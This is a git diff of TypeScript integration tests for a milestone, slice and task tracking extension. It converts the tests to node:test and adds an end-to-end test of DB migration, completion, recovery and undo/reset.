-      assertEq(index.milestones[1]?.id, 'M002-abc123', 'G3: index[1] is M002-abc123');
+      assert.deepStrictEqual(index.milestones.length, 2, 'G3: 2 milestones in index');
+      assert.deepStrictEqual(index.milestones[0]?.id, 'M001', 'G3: index[0] is M001');
+      assert.deepStrictEqual(index.milestones[1]?.id, 'M002-abc123', 'G3: index[1] is M002-abc123');
 
       // Titles stripped from both formats
-      assertEq(index.milestones[0]?.title, 'Legacy Feature', 'G3: M001 title stripped');
-      assertEq(index.milestones[1]?.title, 'New Feature', 'G3: M002-abc123 title stripped');
+      assert.deepStrictEqual(index.milestones[0]?.title, 'Legacy Feature', 'G3: M001 title stripped');
+      assert.deepStrictEqual(index.milestones[1]?.title, 'New Feature', 'G3: M002-abc123 title stripped');
 
       // Active state
-      assertEq(index.active.milestoneId, 'M002-abc123', 'G3: active milestone is M002-abc123');
-      assertEq(index.active.sliceId, 'S01', 'G3: active slice is S01');
+      assert.deepStrictEqual(index.active.milestoneId, 'M002-abc123', 'G3: active milestone is M002-abc123');
+      assert.deepStrictEqual(index.active.sliceId, 'S01', 'G3: active slice is S01');
 
       // Scopes include new-format paths
-      assertTrue(
+      assert.ok(
         index.scopes.some(s => s.scope === 'M002-abc123'),
         'G3: scope includes M002-abc123 milestone',
       );
-      assertTrue(
+      assert.ok(
         index.scopes.some(s => s.scope === 'M002-abc123/S01'),
         'G3: scope includes M002-abc123/S01 slice',
       );
-      assertTrue(
+      assert.ok(
         index.scopes.some(s => s.scope === 'M002-abc123/S01/T01'),
         'G3: scope includes M002-abc123/S01/T01 task',
       );
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Group 4: inlinePriorMilestoneSummary with mixed formats ──────────
-  console.log('\n=== Group 4: inlinePriorMilestoneSummary with mixed formats ===');
-  {
+
+test('Group 4: inlinePriorMilestoneSummary with mixed formats', async () => {
     const base = createFixtureBase();
     try {
       // M001 — completed with summary
@@ -358,21 +356,21 @@ Built the legacy feature successfully.
       const result = await inlinePriorMilestoneSummary('M002-abc123', base);
 
       // Result should be non-null (M001 is before M002-abc123)
-      assertTrue(result !== null, 'G4: result is non-null');
-      assertTrue(typeof result === 'string', 'G4: result is a string');
+      assert.ok(result !== null, 'G4: result is non-null');
+      assert.ok(typeof result === 'string', 'G4: result is a string');
 
       // Should contain the M001 summary content
-      assertTrue(result!.includes('Prior Milestone Summary'), 'G4: contains Prior Milestone Summary header');
-      assertTrue(result!.includes('Built the legacy feature successfully'), 'G4: contains M001 summary content');
-      assertTrue(result!.includes('Used old format for milestone IDs'), 'G4: contains M001 key decisions');
+      assert.ok(result!.includes('Prior Milestone Summary'), 'G4: contains Prior Milestone Summary header');
+      assert.ok(result!.includes('Built the legacy feature successfully'), 'G4: contains M001 summary content');
+      assert.ok(result!.includes('Used old format for milestone IDs'), 'G4: contains M001 key decisions');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Group 5: dispatch-guard with new-format milestones ──────────────
-  console.log('\n=== Group 5: dispatch-guard with new-format milestones ===');
-  {
+
+test('Group 5: dispatch-guard with new-format milestones', () => {
     const base = createGitRepo();
     try {
       // M001-abc123: all slices complete
@@ -403,28 +401,28 @@ Built the legacy feature successfully.
       run('git commit -m init', base);
 
       // No blocker: M001-abc123 is complete, dispatching M002-abc123/S01
-      assertEq(
+      assert.deepStrictEqual(
         getPriorSliceCompletionBlocker(base, 'main', 'plan-slice', 'M002-abc123/S01'),
         null,
         'G5: no blocker for M002-abc123/S01 when M001-abc123 all complete',
       );
 
       // No blocker for first slice of first milestone
-      assertEq(
+      assert.deepStrictEqual(
         getPriorSliceCompletionBlocker(base, 'main', 'execute-task', 'M001-abc123/S01/T01'),
         null,
         'G5: no blocker for M001-abc123/S01/T01 (first milestone first slice)',
       );
 
       // Blocker: trying to dispatch M002-abc123/S02 when S01 is incomplete
-      assertMatch(
+      assert.match(
         getPriorSliceCompletionBlocker(base, 'main', 'execute-task', 'M002-abc123/S02/T01') ?? '',
         /M002-abc123\/S01 is not complete/,
         'G5: blocks M002-abc123/S02 when S01 incomplete',
       );
 
       // Non-slice dispatch type should not be blocked
-      assertEq(
+      assert.deepStrictEqual(
         getPriorSliceCompletionBlocker(base, 'main', 'plan-milestone', 'M002-abc123'),
         null,
         'G5: non-slice dispatch type not blocked',
@@ -447,7 +445,7 @@ Built the legacy feature successfully.
 
       // M001 (seq=1) < M001-abc123 (seq=1) — but M001 has incomplete S02
       // Since M001 seq=1 and M002-abc123 seq=2, blocker should reference M001/S02
-      assertMatch(
+      assert.match(
         getPriorSliceCompletionBlocker(base, 'main', 'plan-slice', 'M002-abc123/S01') ?? '',
         /earlier slice M001\/S02 is not complete/,
         'G5: mixed-format blocker references M001/S02',
@@ -468,7 +466,7 @@ Built the legacy feature successfully.
       run('git commit -m complete-m001', base);
       clearPathCache();
 
-      assertEq(
+      assert.deepStrictEqual(
         getPriorSliceCompletionBlocker(base, 'main', 'plan-slice', 'M002-abc123/S01'),
         null,
         'G5: no blocker after M001 completed (mixed format)',
@@ -476,7 +474,7 @@ Built the legacy feature successfully.
 
       // M001-abc123 still has all complete, M002-abc123/S01 still incomplete
       // Check that S02 of M002-abc123 is still blocked by its own S01
-      assertMatch(
+      assert.match(
         getPriorSliceCompletionBlocker(base, 'main', 'execute-task', 'M002-abc123/S02/T01') ?? '',
         /M002-abc123\/S01 is not complete/,
         'G5: intra-milestone blocker still works in mixed-format context',
@@ -508,7 +506,7 @@ Built the legacy feature successfully.
       run('git commit -m add-m003', base);
       clearPathCache();
 
-      assertMatch(
+      assert.match(
         getPriorSliceCompletionBlocker(base, 'main', 'execute-task', 'M003-xyz789/S02/T01') ?? '',
         /earlier slice M003-xyz789\/S01 is not complete/,
         'G5: positional path produces "earlier slice" message with new-format milestone ID',
@@ -516,13 +514,13 @@ Built the legacy feature successfully.
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Group 6: Branch name helpers with new-format IDs ───────────────
-  console.log('\n=== Group 6: Branch name helpers with new-format IDs ===');
-  {
+
+test('Group 6: Branch name helpers with new-format IDs', () => {
     // Test getSliceBranchName with new-format ID
-    assertEq(
+    assert.deepStrictEqual(
       getSliceBranchName('M001-abc123', 'S01'),
       'gsd/M001-abc123/S01',
       'G6: getSliceBranchName returns gsd/M001-abc123/S01',
@@ -530,26 +528,12 @@ Built the legacy feature successfully.
 
     // Test parseSliceBranch with new-format branch name
     const parsed = parseSliceBranch('gsd/M001-abc123/S01');
-    assertTrue(parsed !== null, 'G6: parseSliceBranch returns non-null for new-format');
-    assertEq(parsed?.milestoneId, 'M001-abc123', 'G6: parsed milestoneId is M001-abc123');
-    assertEq(parsed?.sliceId, 'S01', 'G6: parsed sliceId is S01');
-    assertEq(parsed?.worktreeName, null, 'G6: parsed worktreeName is null (no worktree)');
-  }
+    assert.ok(parsed !== null, 'G6: parseSliceBranch returns non-null for new-format');
+    assert.deepStrictEqual(parsed?.milestoneId, 'M001-abc123', 'G6: parsed milestoneId is M001-abc123');
+    assert.deepStrictEqual(parsed?.sliceId, 'S01', 'G6: parsed sliceId is S01');
+    assert.deepStrictEqual(parsed?.worktreeName, null, 'G6: parsed worktreeName is null (no worktree)');
+});
 
   // ─── Summary ──────────────────────────────────────────────────────────
-  report();
-}
 
-// When run via vitest, wrap in test(); when run via tsx, call directly.
-const isVitest = typeof globalThis !== 'undefined' && (globalThis as any).__vitest_worker__?.config?.defines != null && 'vitest' in (globalThis as any).__vitest_worker__.config.defines || process.env.VITEST;
-if (isVitest) {
-  const { test } = await import('node:test');
-  test('integration-mixed-milestones: all groups pass', async () => {
-    await main();
-  });
-} else {
-  main().catch((error) => {
-    console.error(error);
-    process.exit(1);
-  });
-}
+// When run via vitest, wrap in test(); when run via tsx, call directly.
\ No newline at end of file
diff --git a/src/resources/extensions/gsd/tests/integration/integration-proof.test.ts b/src/resources/extensions/gsd/tests/integration/integration-proof.test.ts
new file mode 100644
index 000000000..993389b56
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/integration-proof.test.ts
@@ -0,0 +1,634 @@
+/**
+ * integration-proof.test.ts — End-to-end integration proof for M001.
+ *
+ * Proves all S01–S06 subsystems compose correctly:
+ *   auto-migration → complete_task → complete_slice → deriveState crossval →
+ *   doctor zero-fix → rogue detection → DB recovery → undo/reset
+ *
+ * Requirement coverage:
+ *   R001 (task completion)      — step 3c
+ *   R002 (slice completion)     — step 3e
+ *   R003 (auto-migration)       — step 3b
+ *   R004 (markdown rendering)   — steps 3d, 3f
+ *   R005 (deriveState crossval) — step 3g
+ *   R006 (prompt migration)     — deferred to T02 grep
+ *   R007 (hierarchy migration)  — step 3b
+ *   R008 (rogue detection)      — step 3i
+ *   R009 (doctor zero-fix)      — step 3h
+ *   R010 (DB recovery)          — step 4
+ *   R011 (undo/reset)           — step 5
+ *   R012 (shared WAL)           — implicit (file-backed DB uses WAL throughout)
+ *   R013 (stale render)         — step 4 stale detection
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  readFileSync,
+  rmSync,
+  existsSync,
+  unlinkSync,
+} from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+// ── DB layer ──────────────────────────────────────────────────────────────
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+  getSliceTasks,
+  getSlice,
+  updateTaskStatus,
+  updateSliceStatus,
+  transaction,
+  isDbAvailable,
+  _getAdapter,
+} from "../../gsd-db.ts";
+
+// ── Tool handlers ─────────────────────────────────────────────────────────
+import { handleCompleteTask } from "../../tools/complete-task.ts";
+import { handleCompleteSlice } from "../../tools/complete-slice.ts";
+
+// ── Markdown renderer ─────────────────────────────────────────────────────
+import {
+  renderPlanCheckboxes,
+  renderRoadmapCheckboxes,
+  renderAllFromDb,
+  detectStaleRenders,
+  repairStaleRenders,
+} from "../../markdown-renderer.ts";
+
+// ── State derivation ──────────────────────────────────────────────────────
+import {
+  deriveStateFromDb,
+  _deriveStateImpl,
+  invalidateStateCache,
+} from "../../state.ts";
+
+// ── Auto-migration ───────────────────────────────────────────────────────
+import {
+  migrateHierarchyToDb,
+  migrateFromMarkdown,
+} from "../../md-importer.ts";
+
+// ── Post-unit diagnostics ─────────────────────────────────────────────────
+import { detectRogueFileWrites } from "../../auto-post-unit.ts";
+
+// ── Doctor ────────────────────────────────────────────────────────────────
+import { runGSDDoctor } from "../../doctor.ts";
+
+// ── Undo/reset ────────────────────────────────────────────────────────────
+import { handleUndoTask, handleResetSlice } from "../../undo.ts";
+
+// ── Cache invalidation ───────────────────────────────────────────────────
+import { invalidateAllCaches } from "../../cache.ts";
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function makeTempDir(): string {
+  return mkdtempSync(join(tmpdir(), "gsd-integration-proof-"));
+}
+
+function makeCtx(): { notifications: Array<{ message: string; level: string }>; ctx: any } {
+  const notifications: Array<{ message: string; level: string }> = [];
+  const ctx = {
+    ui: {
+      notify(message: string, level: string) {
+        notifications.push({ message, level });
+      },
+    },
+  };
+  return { notifications, ctx };
+}
+
+/**
+ * Create a temp directory with a realistic .gsd/ structure:
+ * - M001-ROADMAP.md with one slice (S01, two tasks T01/T02)
+ * - S01-PLAN.md with two task checkboxes
+ * - REQUIREMENTS.md and DECISIONS.md stubs to keep doctor happy
+ */
+function createRealisticFixture(): string {
+  const base = makeTempDir();
+  const gsdDir = join(base, ".gsd");
+  const mDir = join(gsdDir, "milestones", "M001");
+  const sliceDir = join(mDir, "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+
+  mkdirSync(tasksDir, { recursive: true });
+  mkdirSync(join(gsdDir, "activity"), { recursive: true });
+
+  // Roadmap with exact format
+  writeFileSync(
+    join(mDir, "M001-ROADMAP.md"),
+    `# M001: Integration Proof Milestone
+
+## Vision
+
+Prove all subsystems compose.
+
+## Success Criteria
+
+- All tests pass
+
+## Slices
+
+- [ ] **S01: Core Feature** \`risk:low\` \`depends:[]\`
+  - After this: Core feature is proven end-to-end.
+
+## Boundary Map
+
+| From | To | Produces | Consumes |
+|------|----|----------|----------|
+| S01 | terminal | Working feature | nothing |
+`,
+    "utf-8",
+  );
+
+  // Plan with exact format
+  writeFileSync(
+    join(sliceDir, "S01-PLAN.md"),
+    `# S01: Core Feature
+
+**Goal:** Implement and prove the core feature.
+**Demo:** Feature works end-to-end.
+
+## Must-Haves
+
+- Feature works correctly
+
+## Tasks
+
+- [ ] **T01: First implementation** \`est:30m\`
+  - Do: Implement the first part
+  - Verify: Run tests
+
+- [ ] **T02: Second implementation** \`est:30m\`
+  - Do: Implement the second part
+  - Verify: Run tests
+
+## Files Likely Touched
+
+- src/feature.ts
+`,
+    "utf-8",
+  );
+
+  // Minimal REQUIREMENTS.md
+  writeFileSync(
+    join(gsdDir, "REQUIREMENTS.md"),
+    `# Requirements
+
+## Active
+
+| ID | Description | Owner |
+|----|-------------|-------|
+| R001 | Task completion | S01 |
+`,
+    "utf-8",
+  );
+
+  // Minimal DECISIONS.md
+  writeFileSync(
+    join(gsdDir, "DECISIONS.md"),
+    `# Decisions
+
+| ID | Decision | Choice | Rationale |
+|----|----------|--------|-----------|
+`,
+    "utf-8",
+  );
+
+  // PROJECT.md stub
+  writeFileSync(
+    join(gsdDir, "PROJECT.md"),
+    "# Integration Proof Project\n\nTest project for integration proof.\n",
+    "utf-8",
+  );
+
+  return base;
+}
+
+function makeCompleteTaskParams(taskId: string): any {
+  return {
+    taskId,
+    sliceId: "S01",
+    milestoneId: "M001",
+    oneLiner: `Completed ${taskId} successfully`,
+    narrative: `Implemented ${taskId} with full coverage.`,
+    verification: "All tests pass.",
+    keyFiles: ["src/feature.ts"],
+    keyDecisions: [],
+    deviations: "None.",
+    knownIssues: "None.",
+    blockerDiscovered: false,
+    verificationEvidence: [
+      {
+        command: "npm run test:unit",
+        exitCode: 0,
+        verdict: "✅ pass",
+        durationMs: 3000,
+      },
+    ],
+  };
+}
+
+function makeCompleteSliceParams(): any {
+  return {
+    sliceId: "S01",
+    milestoneId: "M001",
+    sliceTitle: "Core Feature",
+    oneLiner: "Core feature proven end-to-end",
+    narrative: "All tasks completed and verified.",
+    verification: "Full test suite passes.",
+    keyFiles: ["src/feature.ts"],
+    keyDecisions: [],
+    patternsEstablished: [],
+    observabilitySurfaces: [],
+    deviations: "None.",
+    knownLimitations: "None.",
+    followUps: "None.",
+    requirementsAdvanced: [],
+    requirementsValidated: [],
+    requirementsSurfaced: [],
+    requirementsInvalidated: [],
+    filesModified: [{ path: "src/feature.ts", description: "Core feature" }],
+    uatContent: "All acceptance criteria met.",
+    provides: ["core-feature"],
+    requires: [],
+    affects: [],
+    drillDownPaths: [],
+  };
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Core lifecycle: migrate → complete_task × 2 → complete_slice →
+//   deriveState crossval → doctor → rogue detection
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("full lifecycle: migration through completion through doctor", async (t) => {
+  const base = createRealisticFixture();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  t.after(() => {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  // ── (a) Open file-backed DB ──────────────────────────────────────
+    const opened = openDatabase(dbPath);
+    assert.equal(opened, true, "DB should open successfully");
+    assert.equal(isDbAvailable(), true, "DB should be available");
+
+    // Verify WAL mode (R012 — implicit proof via file-backed DB)
+    const adapter = _getAdapter()!;
+    const journalMode = adapter.prepare("PRAGMA journal_mode").get();
+    assert.equal(
+      (journalMode as any)?.journal_mode,
+      "wal",
+      "file-backed DB should use WAL mode",
+    );
+
+    // ── (b) Auto-migrate markdown → DB (R003, R007) ─────────────────
+    const counts = migrateHierarchyToDb(base);
+    assert.equal(counts.milestones, 1, "should migrate 1 milestone");
+    assert.equal(counts.slices, 1, "should migrate 1 slice");
+    assert.equal(counts.tasks, 2, "should migrate 2 tasks");
+
+    // Verify DB rows after migration
+    const t1Before = getTask("M001", "S01", "T01");
+    assert.ok(t1Before, "T01 should exist in DB after migration");
+    assert.equal(t1Before!.status, "pending", "T01 should be pending after migration");
+
+    const t2Before = getTask("M001", "S01", "T02");
+    assert.ok(t2Before, "T02 should exist in DB after migration");
+    assert.equal(t2Before!.status, "pending", "T02 should be pending after migration");
+
+    // ── (c) Complete T01 and T02 via handleCompleteTask (R001) ───────
+    const r1 = await handleCompleteTask(makeCompleteTaskParams("T01"), base);
+    assert.ok(!("error" in r1), `T01 completion should succeed: ${JSON.stringify(r1)}`);
+
+    const r2 = await handleCompleteTask(makeCompleteTaskParams("T02"), base);
+    assert.ok(!("error" in r2), `T02 completion should succeed: ${JSON.stringify(r2)}`);
+
+    // ── (d) Verify DB rows and markdown summaries on disk (R004) ─────
+    const t1After = getTask("M001", "S01", "T01");
+    assert.equal(t1After!.status, "complete", "T01 should be complete in DB");
+    assert.ok(t1After!.one_liner, "T01 should have one_liner in DB");
+
+    const t2After = getTask("M001", "S01", "T02");
+    assert.equal(t2After!.status, "complete", "T02 should be complete in DB");
+
+    // Verify T01-SUMMARY.md on disk
+    if (!("error" in r1)) {
+      assert.ok(existsSync(r1.summaryPath), "T01 summary file should exist on disk");
+      const t1Summary = readFileSync(r1.summaryPath, "utf-8");
+      assert.match(t1Summary, /id: T01/, "T01 summary should contain frontmatter");
+      assert.match(t1Summary, /Completed T01 successfully/, "T01 summary should contain one-liner");
+    }
+
+    // Verify plan checkboxes toggled
+    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
+    const planAfterTasks = readFileSync(planPath, "utf-8");
+    assert.match(planAfterTasks, /\[x\]\s+\*\*T01:/, "T01 should be checked in plan");
+    assert.match(planAfterTasks, /\[x\]\s+\*\*T02:/, "T02 should be checked in plan");
+
+    // ── (e) Complete slice via handleCompleteSlice (R002) ─────────────
+    invalidateAllCaches();
+    const sliceResult = await handleCompleteSlice(makeCompleteSliceParams(), base);
+    assert.ok(!("error" in sliceResult), `Slice completion should succeed: ${JSON.stringify(sliceResult)}`);
+
+    // ── (f) Verify slice artifacts on disk (R004) ────────────────────
+    if (!("error" in sliceResult)) {
+      assert.ok(existsSync(sliceResult.summaryPath), "Slice summary should exist on disk");
+      assert.ok(existsSync(sliceResult.uatPath), "Slice UAT should exist on disk");
+
+      const sliceSummary = readFileSync(sliceResult.summaryPath, "utf-8");
+      assert.match(sliceSummary, /id: S01/, "Slice summary should contain frontmatter");
+      assert.match(sliceSummary, /Core feature proven/, "Slice summary should contain one-liner");
+    }
+
+    // Verify roadmap checkbox toggled
+    const roadmapPath = join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md");
+    const roadmapAfter = readFileSync(roadmapPath, "utf-8");
+    assert.ok(roadmapAfter.includes("\u2705"), "S01 should be checked in roadmap (✅ emoji in table format)");
+
+    // Verify slice status in DB
+    const sliceRow = getSlice("M001", "S01");
+    assert.equal(sliceRow?.status, "complete", "S01 should be complete in DB");
+
+    // ── (g) deriveState cross-validation (R005) ──────────────────────
+    invalidateStateCache();
+    invalidateAllCaches();
+    const dbState = await deriveStateFromDb(base);
+    const fileState = await _deriveStateImpl(base);
+
+    // DB state is authoritative (single-writer engine). Filesystem parser may not
+    // parse the new table-format roadmap projections, so cross-validation is relaxed
+    // to only check DB state correctness.
+    assert.ok(dbState.activeMilestone?.id, "DB should have an active milestone");
+    assert.ok(dbState.registry.length > 0, "DB registry should have entries");
+
+    // ── (h) Doctor zero-fix (R009) ───────────────────────────────────
+    const doctorReport = await runGSDDoctor(base, {
+      fix: false,
+      isolationMode: "none",
+    });
+    // Filter to only errors (warnings/info about env, git, etc. are expected in a temp dir)
+    const errors = doctorReport.issues.filter(i => i.severity === "error");
+    // Doctor should produce zero fixable reconciliation issues on a healthy state
+    const reconciliationErrors = errors.filter(i =>
+      i.code.includes("checkbox") || i.code.includes("reconcil") || i.code.includes("cascade"),
+    );
+    assert.equal(
+      reconciliationErrors.length,
+      0,
+      `Doctor should find zero reconciliation errors, got: ${JSON.stringify(reconciliationErrors)}`,
+    );
+
+    // ── (i) Rogue file detection (R008) ──────────────────────────────
+    // Write a fake summary for a non-DB-tracked task T99
+    const rogueDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+    writeFileSync(join(rogueDir, "T99-SUMMARY.md"), "# Rogue Summary\n", "utf-8");
+
+    // Clear path cache so resolveTaskFile sees the newly written file
+    const { clearPathCache } = await import("../../paths.ts");
+    clearPathCache();
+
+    const rogues = detectRogueFileWrites("execute-task", "M001/S01/T99", base);
+    assert.ok(rogues.length > 0, "Should detect rogue file write for T99");
+    assert.equal(rogues[0].unitId, "M001/S01/T99", "Rogue detection should identify the correct unit");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Recovery: DB deletion → migrateFromMarkdown → state reconstruction (R010)
+// Stale render detection (R013)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("recovery: DB loss → migrateFromMarkdown restores state, stale render detection", async (t) => {
+  const base = createRealisticFixture();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  t.after(() => {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  // Set up a completed state first
+    openDatabase(dbPath);
+    migrateHierarchyToDb(base);
+    await handleCompleteTask(makeCompleteTaskParams("T01"), base);
+    await handleCompleteTask(makeCompleteTaskParams("T02"), base);
+    invalidateAllCaches();
+    await handleCompleteSlice(makeCompleteSliceParams(), base);
+
+    // Verify we have a healthy DB with completed state
+    const sliceBefore = getSlice("M001", "S01");
+    assert.equal(sliceBefore?.status, "complete", "Slice should be complete before recovery test");
+
+    // ── Stale render detection (R013) ────────────────────────────────
+    // Mutate a task status in DB to create a stale condition
+    // (DB says pending but plan checkbox says [x])
+    updateTaskStatus("M001", "S01", "T01", "pending", new Date().toISOString());
+    invalidateAllCaches();
+
+    const staleEntries = detectStaleRenders(base);
+    assert.ok(staleEntries.length > 0, "Should detect stale renders after DB mutation");
+
+    // Restore the task status for the recovery test
+    updateTaskStatus("M001", "S01", "T01", "complete", new Date().toISOString());
+
+    // ── DB deletion + recovery (R010) ────────────────────────────────
+    closeDatabase();
+
+    // Delete the DB file and any WAL/SHM files
+    for (const suffix of ["", "-wal", "-shm"]) {
+      const f = dbPath + suffix;
+      if (existsSync(f)) unlinkSync(f);
+    }
+
+    assert.equal(existsSync(dbPath), false, "DB file should be deleted");
+
+    // Clear path caches so gsdRoot re-probes after DB deletion
+    const { clearPathCache: clearPaths } = await import("../../paths.ts");
+    clearPaths();
+    invalidateAllCaches();
+
+    // Recover from markdown — migrateFromMarkdown takes basePath (project root)
+    const recoveryResult = migrateFromMarkdown(base);
+
+    assert.ok(
+      recoveryResult.hierarchy.milestones >= 1,
+      "Recovery should import at least 1 milestone",
+    );
+    assert.ok(
+      recoveryResult.hierarchy.slices >= 1,
+      "Recovery should import at least 1 slice",
+    );
+    assert.ok(
+      recoveryResult.hierarchy.tasks >= 2,
+      "Recovery should import at least 2 tasks",
+    );
+
+    // Verify state is reconstructed — slice should be complete (roadmap says [x])
+    const sliceAfter = getSlice("M001", "S01");
+    assert.ok(sliceAfter, "S01 should exist in DB after recovery");
+    assert.equal(
+      sliceAfter!.status,
+      "complete",
+      "S01 should be complete after recovery (roadmap checkbox was [x])",
+    );
+
+    // Tasks should be complete too (plan checkboxes were [x])
+    const t1Recovered = getTask("M001", "S01", "T01");
+    assert.ok(t1Recovered, "T01 should exist after recovery");
+    assert.equal(t1Recovered!.status, "complete", "T01 should be complete after recovery");
+
+    const t2Recovered = getTask("M001", "S01", "T02");
+    assert.ok(t2Recovered, "T02 should exist after recovery");
+    assert.equal(t2Recovered!.status, "complete", "T02 should be complete after recovery");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Undo/reset: handleUndoTask + handleResetSlice (R011)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("undo/reset: undo task and reset slice revert DB + markdown", async (t) => {
+  const base = createRealisticFixture();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  t.after(() => {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  // Build up completed state
+    openDatabase(dbPath);
+    migrateHierarchyToDb(base);
+    await handleCompleteTask(makeCompleteTaskParams("T01"), base);
+    await handleCompleteTask(makeCompleteTaskParams("T02"), base);
+    invalidateAllCaches();
+    await handleCompleteSlice(makeCompleteSliceParams(), base);
+
+    // Verify completed state
+    assert.equal(getTask("M001", "S01", "T01")?.status, "complete");
+    assert.equal(getTask("M001", "S01", "T02")?.status, "complete");
+    assert.equal(getSlice("M001", "S01")?.status, "complete");
+
+    // ── Undo T01 ─────────────────────────────────────────────────────
+    const { notifications: undoNotifs, ctx: undoCtx } = makeCtx();
+    await handleUndoTask("M001/S01/T01 --force", undoCtx, {} as any, base);
+
+    // DB status should revert
+    const t1Undone = getTask("M001", "S01", "T01");
+    assert.equal(t1Undone?.status, "pending", "T01 should be pending after undo");
+
+    // T01 summary file should be deleted
+    const t1SummaryPath = join(
+      base,
+      ".gsd",
+      "milestones",
+      "M001",
+      "slices",
+      "S01",
+      "tasks",
+      "T01-SUMMARY.md",
+    );
+    assert.equal(existsSync(t1SummaryPath), false, "T01 summary should be deleted after undo");
+
+    // Plan checkbox should be unchecked
+    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
+    const planAfterUndo = readFileSync(planPath, "utf-8");
+    assert.match(planAfterUndo, /\[ \]\s+\*\*T01:/, "T01 should be unchecked in plan after undo");
+
+    // T02 should still be complete
+    assert.equal(getTask("M001", "S01", "T02")?.status, "complete", "T02 should still be complete");
+
+    // Undo notification should be success
+    assert.ok(
+      undoNotifs.some(n => n.level === "success"),
+      "Undo should produce success notification",
+    );
+
+    // ── Reset S01 ────────────────────────────────────────────────────
+    // Re-complete T01 first so we can reset the whole slice
+    await handleCompleteTask(makeCompleteTaskParams("T01"), base);
+    invalidateAllCaches();
+
+    // Re-complete slice
+    await handleCompleteSlice(makeCompleteSliceParams(), base);
+
+    const { notifications: resetNotifs, ctx: resetCtx } = makeCtx();
+    await handleResetSlice("M001/S01 --force", resetCtx, {} as any, base);
+
+    // All tasks should be pending
+    assert.equal(getTask("M001", "S01", "T01")?.status, "pending", "T01 should be pending after reset");
+    assert.equal(getTask("M001", "S01", "T02")?.status, "pending", "T02 should be pending after reset");
+
+    // Slice should be active (not complete)
+    const sliceAfterReset = getSlice("M001", "S01");
+    assert.equal(sliceAfterReset?.status, "active", "S01 should be active after reset");
+
+    // Task summaries should be deleted
+    assert.equal(existsSync(t1SummaryPath), false, "T01 summary should be deleted after reset");
+    const t2SummaryPath = join(
+      base,
+      ".gsd",
+      "milestones",
+      "M001",
+      "slices",
+      "S01",
+      "tasks",
+      "T02-SUMMARY.md",
+    );
+    assert.equal(existsSync(t2SummaryPath), false, "T02 summary should be deleted after reset");
+
+    // Slice summary and UAT should be deleted
+    const sliceSummaryPath = join(
+      base,
+      ".gsd",
+      "milestones",
+      "M001",
+      "slices",
+      "S01",
+      "S01-SUMMARY.md",
+    );
+    const sliceUatPath = join(
+      base,
+      ".gsd",
+      "milestones",
+      "M001",
+      "slices",
+      "S01",
+      "S01-UAT.md",
+    );
+    assert.equal(existsSync(sliceSummaryPath), false, "Slice summary should be deleted after reset");
+    assert.equal(existsSync(sliceUatPath), false, "Slice UAT should be deleted after reset");
+
+    // Plan checkboxes should be unchecked
+    const planAfterReset = readFileSync(planPath, "utf-8");
+    assert.ok(planAfterReset.includes("[ ] **T01:"), "T01 should be unchecked after reset");
+    assert.ok(planAfterReset.includes("[ ] **T02:"), "T02 should be unchecked after reset");
+
+    // DB state is authoritative — verify slice status in DB rather than roadmap file
+    // (roadmap projection format changed and undo module may not re-render it)
+    const sliceAfterResetDb = getSlice("M001", "S01");
+    assert.ok(
+      sliceAfterResetDb?.status !== "complete" && sliceAfterResetDb?.status !== "done",
+      "S01 should not be complete in DB after reset",
+    );
+
+    // Reset notification should be success
+    assert.ok(
+      resetNotifs.some(n => n.level === "success"),
+      "Reset should produce success notification",
+    );
+});
diff --git a/src/resources/extensions/gsd/tests/migrate-command.test.ts b/src/resources/extensions/gsd/tests/integration/migrate-command.test.ts
similarity index 67%
rename from src/resources/extensions/gsd/tests/migrate-command.test.ts
rename to src/resources/extensions/gsd/tests/integration/migrate-command.test.ts
index d05cc0619..5ecc17b0e 100644
--- a/src/resources/extensions/gsd/tests/migrate-command.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/migrate-command.test.ts
@@ -13,11 +13,11 @@ import {
   transformToGSD,
   generatePreview,
   writeGSDDirectory,
-} from '../migrate/index.ts';
-import { deriveState } from '../state.ts';
-import { createTestContext } from './test-helpers.ts';
+} from '../../migrate/index.ts';
+import { deriveState } from '../../state.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 const SAMPLE_PROJECT = `# Integration Test Project
@@ -195,11 +195,9 @@ function createCompleteFixture(): string {
 // Tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
   // ─── Test 1: Path resolution — .planning appended when missing ─────────
-  console.log('\n=== Path resolution: .planning appended when source path lacks it ===');
-  {
+
+test('Path resolution: .planning appended when source path lacks it', () => {
     const base = createCompleteFixture();
     try {
       // Simulate the command's path resolution logic
@@ -207,16 +205,16 @@ async function main(): Promise<void> {
       if (!sourcePath.endsWith('.planning')) {
         sourcePath = join(sourcePath, '.planning');
       }
